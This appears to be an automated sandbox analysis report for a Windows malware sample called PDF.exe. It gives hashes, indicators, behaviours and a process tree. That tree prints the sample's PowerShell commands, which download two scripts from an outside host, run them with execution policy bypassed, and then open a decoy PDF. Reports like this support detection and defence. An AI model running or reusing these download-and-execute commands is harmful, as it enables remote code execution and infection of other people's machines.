Resubmissions
21-01-2025 13:31
250121-qspexswjes 1021-01-2025 12:04
250121-n8tngasrhm 1013-07-2024 12:59
240713-p8a2ss1gpq 10Analysis
-
max time kernel
96s -
max time network
97s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
21-01-2025 13:31
Static task
static1
Behavioral task
behavioral1
Sample
PDF.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
PDF.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
PDF.exe
Resource
android-x64-arm64-20240624-en
Behavioral task
behavioral4
Sample
PDF.exe
Resource
android-33-x64-arm64-20240624-en
Behavioral task
behavioral5
Sample
PDF.exe
Resource
macos-20241106-en
Behavioral task
behavioral6
Sample
PDF.exe
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral7
Sample
PDF.exe
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral8
Sample
PDF.exe
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral9
Sample
PDF.exe
Resource
debian9-mipsel-20240226-en
General
-
Target
PDF.exe
-
Size
258KB
-
MD5
34c2047d0b69ba023b700c21431accc0
-
SHA1
e34c28611707c81565cb73d8a1a46dfc3ab2495a
-
SHA256
ff9b39d07fd6e4a7f98d109664d91de9e318671da6412da85396541722d92799
-
SHA512
a1566d65beb8135edfcb5c4a09631bc17dff56db672621990a10d0eff37a0290c7e1e9705f1918a7e719cbea4b1cecc29bb8254da946108e9bd5432070cc8ca7
-
SSDEEP
6144:VbJhs7QW69hd1MMdxPe9N9uA0hu9TBrjJ0Xxne0AqGLj:VbjDhu9TV6xeJqG3
Malware Config
Extracted
http://thelustfactory.com/vns/1.ps1
Extracted
http://thelustfactory.com/vns/2.ps1
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation PDF.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation cmd.exe -
pid Process 3732 powershell.exe 1380 powershell.exe 1936 powershell.exe 3000 powershell.exe -
HTTP links in PDF interactive object 1 IoCs
Detects HTTP links in interactive objects within PDF files.
resource yara_rule behavioral2/files/0x000a000000023b7a-57.dat pdf_with_link_action -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AcroRd32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2320 timeout.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings cmd.exe -
Suspicious behavior: EnumeratesProcesses 26 IoCs
pid Process 3732 powershell.exe 3732 powershell.exe 1380 powershell.exe 1380 powershell.exe 1936 powershell.exe 3000 powershell.exe 2004 AcroRd32.exe 2004 AcroRd32.exe 2004 AcroRd32.exe 2004 AcroRd32.exe 2004 AcroRd32.exe 2004 AcroRd32.exe 2004 AcroRd32.exe 2004 AcroRd32.exe 2004 AcroRd32.exe 2004 AcroRd32.exe 2004 AcroRd32.exe 2004 AcroRd32.exe 2004 AcroRd32.exe 2004 AcroRd32.exe 2004 AcroRd32.exe 2004 AcroRd32.exe 2004 AcroRd32.exe 2004 AcroRd32.exe 2004 AcroRd32.exe 2004 AcroRd32.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 3732 powershell.exe Token: SeDebugPrivilege 1380 powershell.exe Token: SeDebugPrivilege 1936 powershell.exe Token: SeDebugPrivilege 3000 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2004 AcroRd32.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 2004 AcroRd32.exe 2004 AcroRd32.exe 2004 AcroRd32.exe 2004 AcroRd32.exe 2004 AcroRd32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4912 wrote to memory of 4460 4912 PDF.exe 83 PID 4912 wrote to memory of 4460 4912 PDF.exe 83 PID 4460 wrote to memory of 3732 4460 cmd.exe 85 PID 4460 wrote to memory of 3732 4460 cmd.exe 85 PID 4460 wrote to memory of 1380 4460 cmd.exe 86 PID 4460 wrote to memory of 1380 4460 cmd.exe 86 PID 4460 wrote to memory of 1936 4460 cmd.exe 87 PID 4460 wrote to memory of 1936 4460 cmd.exe 87 PID 4460 wrote to memory of 3000 4460 cmd.exe 88 PID 4460 wrote to memory of 3000 4460 cmd.exe 88 PID 4460 wrote to memory of 2320 4460 cmd.exe 89 PID 4460 wrote to memory of 2320 4460 cmd.exe 89 PID 4460 wrote to memory of 2004 4460 cmd.exe 90 PID 4460 wrote to memory of 2004 4460 cmd.exe 90 PID 4460 wrote to memory of 2004 4460 cmd.exe 90 PID 2004 wrote to memory of 3144 2004 AcroRd32.exe 95 PID 2004 wrote to memory of 3144 2004 AcroRd32.exe 95 PID 2004 wrote to memory of 3144 2004 AcroRd32.exe 95 PID 3144 wrote to memory of 3700 3144 RdrCEF.exe 97 PID 3144 wrote to memory of 3700 3144 RdrCEF.exe 97 PID 3144 wrote to memory of 3700 3144 RdrCEF.exe 97 PID 3144 wrote to memory of 3700 3144 RdrCEF.exe 97 PID 3144 wrote to memory of 3700 3144 RdrCEF.exe 97 PID 3144 wrote to memory of 3700 3144 RdrCEF.exe 97 PID 3144 wrote to memory of 3700 3144 RdrCEF.exe 97 PID 3144 wrote to memory of 3700 3144 RdrCEF.exe 97 PID 3144 wrote to memory of 3700 3144 RdrCEF.exe 97 PID 3144 wrote to memory of 3700 3144 RdrCEF.exe 97 PID 3144 wrote to memory of 3700 3144 RdrCEF.exe 97 PID 3144 wrote to memory of 3700 3144 RdrCEF.exe 97 PID 3144 wrote to memory of 3700 3144 RdrCEF.exe 97 PID 3144 wrote to memory of 3700 3144 RdrCEF.exe 97 PID 3144 wrote to memory of 3700 3144 RdrCEF.exe 97 PID 3144 wrote to memory of 3700 3144 RdrCEF.exe 97 PID 3144 wrote to memory of 3700 3144 RdrCEF.exe 97 PID 3144 wrote to memory of 3700 3144 RdrCEF.exe 97 PID 3144 wrote to memory of 3700 3144 RdrCEF.exe 97 PID 3144 wrote to memory of 3700 3144 RdrCEF.exe 97 PID 3144 wrote to memory of 3700 3144 RdrCEF.exe 97 PID 3144 wrote to memory of 3700 3144 RdrCEF.exe 97 PID 3144 wrote to memory of 3700 3144 RdrCEF.exe 97 PID 3144 wrote to memory of 3700 3144 RdrCEF.exe 97 PID 3144 wrote to memory of 3700 3144 RdrCEF.exe 97 PID 3144 wrote to memory of 3700 3144 RdrCEF.exe 97 PID 3144 wrote to memory of 3700 3144 RdrCEF.exe 97 PID 3144 wrote to memory of 3700 3144 RdrCEF.exe 97 PID 3144 wrote to memory of 3700 3144 RdrCEF.exe 97 PID 3144 wrote to memory of 3700 3144 RdrCEF.exe 97 PID 3144 wrote to memory of 3700 3144 RdrCEF.exe 97 PID 3144 wrote to memory of 3700 3144 RdrCEF.exe 97 PID 3144 wrote to memory of 3700 3144 RdrCEF.exe 97 PID 3144 wrote to memory of 3700 3144 RdrCEF.exe 97 PID 3144 wrote to memory of 3700 3144 RdrCEF.exe 97 PID 3144 wrote to memory of 3700 3144 RdrCEF.exe 97 PID 3144 wrote to memory of 3700 3144 RdrCEF.exe 97 PID 3144 wrote to memory of 3700 3144 RdrCEF.exe 97 PID 3144 wrote to memory of 3700 3144 RdrCEF.exe 97 PID 3144 wrote to memory of 3700 3144 RdrCEF.exe 97 PID 3144 wrote to memory of 3700 3144 RdrCEF.exe 97 PID 3144 wrote to memory of 4240 3144 RdrCEF.exe 98 PID 3144 wrote to memory of 4240 3144 RdrCEF.exe 98 PID 3144 wrote to memory of 4240 3144 RdrCEF.exe 98 PID 3144 wrote to memory of 4240 3144 RdrCEF.exe 98 PID 3144 wrote to memory of 4240 3144 RdrCEF.exe 98
Processes
-
C:\Users\Admin\AppData\Local\Temp\PDF.exeC:\Users\Admin\AppData\Local\Temp\PDF.exe DSRM -subtree1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4912 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7E96.tmp\7E97.tmp\7E98.bat C:\Users\Admin\AppData\Local\Temp\PDF.exe DSRM -subtree"2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4460 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('http://thelustfactory.com/vns/1.ps1', 'C:\Users\Admin\AppData\Roaming\1.ps1')"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3732
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('http://thelustfactory.com/vns/2.ps1', 'C:\Users\Admin\AppData\Roaming\2.ps1')"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1380
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\1.ps13⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1936
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\2.ps13⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3000
-
-
C:\Windows\system32\timeout.exetimeout /t 53⤵
- Delays execution with timeout.exe
PID:2320
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\pdf.pdf"3⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2004 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140434⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3144 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=4D4FCFDD75C62D3159F6E06B757C0BAA --mojo-platform-channel-handle=1744 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵
- System Location Discovery: System Language Discovery
PID:3700
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=79B58C2E53A61CB109FAE62D8B5101EA --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=79B58C2E53A61CB109FAE62D8B5101EA --renderer-client-id=2 --mojo-platform-channel-handle=1752 --allow-no-sandbox-job /prefetch:15⤵
- System Location Discovery: System Language Discovery
PID:4240
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=4EFBFCDEC99F027824C5D2A8C71335E8 --mojo-platform-channel-handle=2328 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵
- System Location Discovery: System Language Discovery
PID:4424
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=00D70898CE04C370F10D30AA17294D1C --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=00D70898CE04C370F10D30AA17294D1C --renderer-client-id=5 --mojo-platform-channel-handle=2468 --allow-no-sandbox-job /prefetch:15⤵
- System Location Discovery: System Language Discovery
PID:8
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=67F26F0D372AC258245AFDAC3619DCA7 --mojo-platform-channel-handle=2684 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵
- System Location Discovery: System Language Discovery
PID:4408
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=97A9541B2C99F17CEE61AF6A31C493E5 --mojo-platform-channel-handle=2672 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵
- System Location Discovery: System Language Discovery
PID:1696
-
-
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1776
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
56KB
MD5752a1f26b18748311b691c7d8fc20633
SHA1c1f8e83eebc1cc1e9b88c773338eb09ff82ab862
SHA256111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131
SHA512a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5
-
Filesize
64KB
MD51cf64b6a4a5a0aa24fe91f0a64e671a9
SHA1984c3fa7135b92edfa2af2c0a741ab73d699b31f
SHA256bbf1ca7dfdac6dfe3198f074df2fde0687e69f2029c7ec6ff5774a3dad922d76
SHA51249a4994973b032bec8eeb0ebafefbb6ede90e1e1bd08db37e63e199e0e3025489912914d547762bffb501f5b58ee3fdb964433b53d1ef1e04a53d9b36d4ba630
-
Filesize
36KB
MD5b30d3becc8731792523d599d949e63f5
SHA119350257e42d7aee17fb3bf139a9d3adb330fad4
SHA256b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3
SHA512523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD5b66db53846de4860ca72a3e59b38c544
SHA12202dc88e9cddea92df4f4e8d83930efd98c9c5a
SHA256b1a00fcea37b39a5556eea46e50711f7713b72be077a73cb16515ca3538d6030
SHA51272eff4ae1d541c4438d3cd85d2c1a8c933744b74c7a2a4830ffe398fee88f1a8c5b241d23e94bcdf43b4be28c2747b331a280a7dc67ab67d8e72c6569f016527
-
Filesize
64B
MD5446dd1cf97eaba21cf14d03aebc79f27
SHA136e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7
-
Filesize
712B
MD50e9ce5162ba7661c863a835f9d34d907
SHA10b351312ab57a02857753cab2287da680955f40d
SHA256b67f37e765a5be87d9591efdb0501f0c97aa342ad1e4c34a711828c4a505c81e
SHA5128d7c0a3cc95628cbec8a215f365c3ed86746e7b350c811ace5ea4419031adbdbe75dc7d1350d9c71db51f5cbb972db4e33b1d05e9a3e2a109c559eb065811ec0
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
139KB
MD55afaf79789a776d81ec91ccbdc9fdaba
SHA16703901978dcb3dbf2d9915e1d3e066cfe712b0a
SHA25638c9792d725c45dd431699e6a3b0f0f8e17c63c9ac7331387ee30dcc6e42a511
SHA51209253eb87d097bdaa39f98cbbea3e6d83ee4641bca76c32c7eb1add17e9cb3117adb412d2e04ab251cca1fb19afa8b631d1e774b5dc8ae727f753fe2ffb5f288